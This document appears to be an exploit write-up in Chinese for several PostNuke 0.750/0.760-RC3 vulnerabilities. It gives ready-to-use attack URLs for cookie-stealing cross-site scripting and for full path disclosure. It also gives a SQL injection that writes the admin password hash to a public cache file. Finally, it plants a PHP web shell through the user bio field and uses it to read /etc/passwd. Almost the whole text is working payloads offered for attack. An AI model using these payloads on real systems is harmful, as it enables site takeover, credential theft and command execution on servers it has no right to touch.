PostNuke多个远程输入验证漏洞 Exploit

                                                --- 跨站脚本 ---

http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?skin=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 
http://[HOST]/[DIR]/modules/Xanthia/pnhtml/demo.php?paletteid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  

如果可以看到php错误并注册global = On
http://[HOST]/[DIR]/modules/Multisites/installation/config.php?serverName=<H1>SUICIDE</H1> 

或者对于0.750
http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php?serverName=<H1>SUICIDE</H1>

- --- 完整路径泄漏 ---

http://[HOST]/[DIR]/modules/Xanthia/pndocs/themes/theme.php

Error message :
- ---------------
Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) \
[function.main]: failed to open stream: No such file or directory in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
8

Fatal error: main() [function.require]: Failed opening required \
'/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
                8
- ---------------

http://[HOST]/[DIR]/modules/Xanthia/pnclasses/Xanthia.php

Error message :
- ---------------
Fatal error: Call to undefined function pnModGetVar() in \
                /www/PostNuke-0.760-RC3/html/modules/Xanthia/pnclasses/Xanthia.php on \
                line 48
- ---------------

http://[HOST]/[DIR]/modules/Blocks/pnblocks/user.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/thelang.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/text.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/html.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/menu.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/finclude.php
http://[HOST]/[DIR]/modules/Blocks/pnblocks/button.php


Error message :
- ---------------
Fatal error: Call to undefined function pnSecAddSchema() in \
                /www/PostNuke-0.760-RC3/html/modules/Blocks/pnblocks/button.php on \
                line 48
- ---------------


http://[HOST]/[DIR]/modules/NS-Multisites/installation/config.php
或者对于0.760RC3
http://[HOST]/[DIR]/modules/Multisites/installation/config.php


Error message :
- ---------------
Warning: main(parameters/whoisit.inc.php) [function.main]: failed to open stream: No \
such file or directory in \
/www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php on line 2

Warning: main() [function.include]: Failed opening 'parameters/whoisit.inc.php' for \
inclusion (include_path='.:') in \
                /www/PostNuke-0.750/html/modules/NS-Multisites/installation/config.php \
                on line 2
- ---------------


http://[HOST]/[DIR]/xmlrpc.php

Error message :
- ---------------
Fatal error: Cannot redeclare xmlrpc_decode() in \
                /www/PostNuke-0.760-RC3/html/modules/xmlrpc/lib/xmlrpc.inc on line \
                1068
- ---------------


- --- RSS模块中的跨站脚本 ---

http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_slashbox.php?rss_url=[XSS]
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_simple.php?url=">[XSS]
http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/magpie_debug.php?url=%22%3E[XSS]

- --- RSS模块中的完整路径泄漏 ---

http://[HOST]/[DIR]/modules/RSS/pnincludes/scripts/simple_smarty.php

- ---

Warning: main(/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php) \
[function.main]: failed to open stream: No such file or directory in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
8

Fatal error: main() [function.require]: Failed opening required \
'/home/kellan/projs/magpierss/scripts/Smarty/Smarty.class.php' (include_path='.:') in \
/www/PostNuke-0.760-RC3/html/modules/RSS/pnincludes/scripts/simple_smarty.php on line \
8

- --

- --- Sql注入 ---

[获取管理口令]

检查PostNuke目录 

http://[HOST]/[DIR]/modules.php?op=modload&name='cXIb8O3&file=index

Error message :
- ---------------
Fatal error: Call to a member function GetRowAssoc() on a non-object in \
                /www/PostNuke-0.750/source/html/modules/Xanthia/pnclasses/Xanthia.php \
                on line 977
- ---------------

比如前缀是/www/PostNuke-0.750/source/html/，现在可以进行攻击，但必须要知道数据库前缀。

http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3'/*&type=admin&func=view

错误消息是：

Error message :
- ---------------
Failed to load module Xanthia' UNION SELECT pn_uname,pn_pass FROM pn__users WHERE \
pn_uid=2 INTO OUTFILE \
'/www/PostNuke-0.750/source/html/pnTemp/Xanthia_cache/cXIb8O3'/* (at function: \
                "view")
- ---------------

但现在转到

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3

这样就获得了id=2用户的口令。

[无显示上载]

http://[HOST]/[DIR]/user.php?op=edituser

注入额外信息的php代码，例如：

- ---
<?php system($_GET[cXIb8O3]); ?>
- ---

现在就可以用这个代码创建php脚本，如：

http://[HOST]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_bio,pn_uname%20FROM%20[db_prefix]users%20WHERE%20pn_uid=[YOUR_ID]%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/Xanthia_cache/cXIb8O3.php'/*&type=admin&func=view

然后：

http://[HOST]/[DIR]/pnTemp/Xanthia_cache/cXIb8O3.php?cXIb8O3=cat /etc/passwd